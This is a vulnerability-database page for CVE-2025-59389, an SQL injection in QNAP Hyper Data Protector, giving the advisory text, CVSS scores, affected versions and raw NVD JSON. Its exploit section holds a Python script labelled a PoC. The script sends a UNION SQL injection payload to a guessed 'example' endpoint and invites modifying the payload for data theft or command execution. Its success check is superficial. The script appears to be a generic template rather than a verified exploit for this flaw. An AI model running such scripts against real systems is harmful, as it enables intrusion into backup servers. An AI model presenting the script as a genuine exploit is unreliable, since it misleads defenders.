Security Vulnerability Report
中文
CVE-2025-59389 CVSS 9.8 CRITICAL

CVE-2025-59389

Published: 2026-01-02 16:17:00
Last Modified: 2026-01-22 18:20:58
Source: [email protected]

Description

An SQL injection vulnerability has been reported to affect Hyper Data Protector. The remote attackers can then exploit the vulnerability to execute unauthorized code or commands. We have already fixed the vulnerability in the following versions: Hyper Data Protector 2.2.4.1 and later

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:hyper_data_protector:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:qnap:hyper_data_protector:2.0.0.1115:beta:*:*:*:*:*:* - VULNERABLE
QNAP Hyper Data Protector < 2.2.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-59389 SQL Injection PoC for QNAP Hyper Data Protector # Target: QNAP Hyper Data Protector < 2.2.4.1 def exploit_sql_injection(target_url): """ SQL Injection PoC - Extract database version information Modify the payload for different attacks (data extraction, command execution) """ # SQL Injection payload to extract database version payload = "' UNION SELECT NULL,@@version,NULL,NULL,NULL--" # Target endpoint (adjust based on actual vulnerable endpoint) endpoint = "/api/v1/backup/query" # Example endpoint headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Data field vulnerable to SQL injection data = { 'task_id': payload, 'user_id': '1' } full_url = target_url.rstrip('/') + endpoint try: print(f"[*] Sending SQL injection payload to {full_url}") response = requests.post(full_url, data=data, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[+] Response length: {len(response.text)} bytes") # Parse response for injected data if 'UNION' in response.text or 'version' in response.text.lower(): print("[+] Potential SQL injection detected!") return True else: print(f"[-] Request failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} https://192.168.1.100:8080") sys.exit(1) target = sys.argv[1] exploit_sql_injection(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59389", "sourceIdentifier": "[email protected]", "published": "2026-01-02T16:17:00.433", "lastModified": "2026-01-22T18:20:57.957", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An SQL injection vulnerability has been reported to affect Hyper Data Protector. The remote attackers can then exploit the vulnerability to execute unauthorized code or commands.\n\nWe have already fixed the vulnerability in the following versions:\nHyper Data Protector 2.2.4.1 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:hyper_data_protector:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.1.0.0226", "versionEndExcluding": "2.2.4.1", "matchCriteriaId": "C50EED47-2DDC-46DE-83FA-6F3977855DDB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:qnap:hyper_data_protector:2.0.0.1115:beta:*:*:*:*:*:*", "matchCriteriaId": "5201012D-5227-4698-AE04-E00EBD5C37CC"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-48", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.